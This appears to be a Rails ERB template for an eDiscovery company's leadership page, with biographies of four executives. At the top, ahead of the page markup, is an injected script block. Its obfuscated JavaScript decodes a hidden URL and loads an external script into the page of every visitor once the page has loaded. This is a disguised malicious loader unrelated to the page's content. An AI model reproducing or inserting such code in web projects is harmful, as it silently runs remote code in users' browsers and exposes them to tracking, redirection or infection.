<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "leadership.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h1 class="heading-decorated heading-decorated_center">Leadership</h1>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<!-- Lawyers and Paralegals-->
<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50">
      <div class="col-md-12 col-lg-12 col-xl-12">
        <div class="thumb thumb-corporate text-left">
          <div class="thumb-corporate__caption">
            <p class="thumb__title">Frank Canterino</p>
            <p class="thumb__subtitle">Chief Technology Officer & Co-Founding Partner</p>
            <p>Frank Canterino is a nationally recognized industry leader with over 20 years of Litigation Support experience. Frank faces challenges head-on consistently committing himself to completely understanding the client's needs and objectives. He truly believes that client satisfaction leads to ultimate success.</p>
            <p>Frank is an eDiscovery expert who advises clients on Litigation Readiness, Data Collection Strategy, Early Data Assessment, Defensible Data Reduction, Rule 26F Meet and Confer Negotiations and eDiscovery Software Implementation.</p>
            <p>Prior to creating Empire Discovery, Frank spent 8 years with SuperiorGlacier, a regional litigation support company with offices in New York, Chicago and Washington D.C. For the last 4 years, Frank served as the Executive Vice President of Sales and Client Services where he helped transform the company from a paper based company to a technology company.</p>
            <p>Frank is also the Co-founder of the Litigation Support Technology and News blog. A blog that provides articles and comments about eDiscovery, developments in litigation support, and the use of technology by law firms and corporate law departments.</p>
          </div>
        </div>
      </div>
      <div class="col-md-12 col-lg-12 col-xl-12">
        <div class="thumb thumb-corporate text-left">
          <div class="thumb-corporate__caption">
            <p class="thumb__title">Steve Wallrapp</p>
            <p class="thumb__subtitle">Executive Vice President of Electronic Services</p>
            <p>Steve has over 20 years of experience in the Litigation Support and Project Management field. He is an experienced professional with a strong background in Electronic Discovery, Data Hosting and Technology Consulting. Steve is an expert in working with many Litigation Support Products such as IPRO, Law, iConect, Concordance, Clearwell, Ringtail and Relativity.</p>
            <p>Prior to joining Empire Discovery, Steve spent 10 years with SuperiorGlacier, primarily as a Senior Project Manager, working on large litigation matters with clients ranging from AM LAW top 200 law firms, Corporations and Financial institutions.</p>
          </div>
        </div>
      </div>
      <div class="col-md-12 col-lg-12 col-xl-12">
        <div class="thumb thumb-corporate text-left">
          <div class="thumb-corporate__caption">
            <p class="thumb__title">Ahsan Sheikh</p>
            <p class="thumb__subtitle">Director of Electronic Services</p>
            <p>Ahsan has over 20 years of Litigation Support and IT experience. In this role, Ahsan oversees all aspects of Empire Discovery's Electronic Discovery and Web Hosting services. Ahsan ensures the delivery of accurate and timely client requests through consistent attention to detail, process and service. He leads his team by example always striving for a quality product to satisfy our client's needs.</p>
            <p>Prior to joining Empire Discovery, Ahsan held various positions at SuperiorGlacier, Scarab and CDS primarily as eDiscovery Manager handling large scale and complex eDiscovery and hosting requests.</p>
          </div>
        </div>
      </div>
      <div class="col-md-12 col-lg-12 col-xl-12">
        <div class="thumb thumb-corporate text-left">
          <div class="thumb-corporate__caption">
            <p class="thumb__title">Kevin Karapetian</p>
            <p class="thumb__subtitle">Director of Hosting Services</p>
            <p>Kevin Karapetian is the Director of Hosting Services for Empire Discovery. Kevin’s 20 years of experience combine the skills of professional project management with the knowledge and expertise required for successful work in the litigation support industry. Kevin is an expert in Relativity, Xera and Clearwell.</p>
            <p>Kevin started his litigation support career in Paper Discovery as a Document Scanner. After a year, he then made the transition into project management. Prior to joining Empire,Kevin spent 3 years working for De Novo Legal a Relativity gold partner as their Hosting Project Manager.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<%= render partial: 'shared/contact_form' %>
